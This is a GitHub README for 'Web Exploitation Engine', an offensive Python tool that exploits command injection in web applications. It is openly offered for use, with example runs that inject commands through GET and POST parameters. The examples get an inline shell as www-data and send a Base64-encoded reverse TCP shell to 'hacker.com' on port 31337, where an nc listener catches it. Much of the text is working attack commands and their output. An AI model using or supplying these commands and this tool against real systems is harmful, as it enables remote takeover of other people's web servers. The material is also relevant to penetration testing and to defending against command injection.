Latest commit 80c743a
Mar 17, 2013
|Failed to load latest commit information.|
Web Exploitation Engine - Generic Command Injection Exploitation Utility. This is a simple enough utility written to exploit command injection bugs in web applications. I had abandoned this project a while ago, then saw the brilliant "rce.py" tool written by @LaNMaSteR53, and saw his elegant solution to the "how to denote where to put the payload" problem, so I shamelessly ripped his code to write this. This tool can either give an inline shell like the original rce.py (it uses the same functions, just rewritten to suit), or a reverse shell. Currently it only supports a Base64 encoded Reverse TCP shell payload, however the magic of the "payloads" module is that you can actually expand it. You just have to do a little work to add more payloads. So, how do I use this. The only mandatory argument is --url='URL HERE'. In the url, using the <rce> tag, you specify where to inject code in the request. For example: h4x# ./we.py --url='http://localhost/test/cmd.php?=<rce>' shell> id [*] Executed: id uid=33(www-data) gid=33(www-data) groups=33(www-data) shell> By default, it assumes a GET request and uses the inline shell mode. To specify a POST request, you pass the params and values just like a GET, except you specify --method=post to tell the parser it is a POST injection. For example: h4x# ./we.py --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post shell> id [*] Executed: id uid=33(www-data) gid=33(www-data) groups=33(www-data) shell> The --shell arguement tells it if you want an inline, or reverse shell. Default operation is the "inline shell" like the original rce.py script. To do a reverse shell, --shell=reverse is needed. You also must specify the host and port to connect to. --lhost and --lport arguments are, by default, 127.0.0.1 and 4444 respectively. So, to get a reverse shell sent to port 31337 on "hacker.com", using the above GET request exploit, we can do the following. h4x# ./we.py --url='http://localhost/test/cmd.php?cmd=<rce>' --shell=reverse --lhost=hacker.com --lport=31337 [+] Doing a reverse shell! [*] LHOST: hacker.com [*] LPORT: 31337 [!] Hope your listener is listening And over at "hacker.com" (localhost on my box for this demo), we get the following: # nc -lvp 31337 listening on [any] 31337 ... connect to [127.0.0.1] from localhost [127.0.0.1] 58794 /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ Reverse shell access works rather flawlessly. For now, just the python-reverse payload, however I hope to add a python bindshell soon, along with, perhaps, some Perl payloads for extra fun.